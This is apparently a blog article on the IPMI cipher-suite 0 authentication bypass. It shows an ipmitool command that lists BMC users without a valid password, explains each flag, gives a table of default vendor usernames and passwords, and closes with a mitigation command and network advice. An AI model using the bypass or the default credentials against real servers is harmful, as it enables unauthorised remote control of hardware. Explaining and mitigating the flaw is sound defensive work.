Information

Recently, Supermicro and a number of other companies have come under fire due to the inherent vulnerabilities in their IPMI implementation. In this article, I’ll be exploring the results of the vulnerability, and the ways in which this can be exploited, as well as some important mitigation strategies.

What is cipher-suite 0?

Cipher-suite 0 is a pseudo-cipher suite used in IPMI implementations which simply ignores authentication and allows full access without valid credentials.

This allows a remote attacker to exploit the BMC IPMI interface present in many rackmount servers to gain remote console access to the hardware and a shell on the embedded controller.

Exploitation

How do we exploit it?

Those familiar with IPMI will be experienced with the ipmitool command, used to locally or remotely control the IPMI controller from Linux.

To use ipmitool with cipher-suite 0, simply pass the -C 0 flag to the command. For example:

# ipmitool -I lanplus -C 0 -H 10.0.0.2 -U ADMIN -P password user list

Let’s break down what this command does:
ipmitool
The command used to control IPMI interfaces
-I lanplus
To specify IPMI v2 protocol
-C 0
Cipher-suite 0, the subject of this article
-H 10.0.0.2
Remote host to run the command against
-U ADMIN
Username: Use a valid username from the table below.
-P password
Password: Arbitrary, since it’s ignored anyway.
user list
The command we wish to run. In this case, return a list of users.

This command will complete without issue despite not knowing the actual password.

Default usernames and passwords:

Vendor Username Password
Dell root Calvin
IBM USERID PASSW0RD
Supermicro ADMIN ADMIN
Oracle root changeme
Fujitsu admin admin
Asus admin admin

Mitigation:

Using ipmitool, we’re able to disable cipher-suite 0. Run the following command on the local machine, or modify the flags to run it remotely:
ipmitool -I open raw 0xC 0x1 1 0x18 0 0x40 0x44 0x44 0x44 0x44 0x44 0x44 0x4

This should disable cipher-suite 0, effectively mitigating the flaw. Further, make sure you keep IPMI interfaces off public IP addresses, or addresses accessible to people who don’t need them. If you run an IDS, make sure it has cipher-suite 0 in its signature database.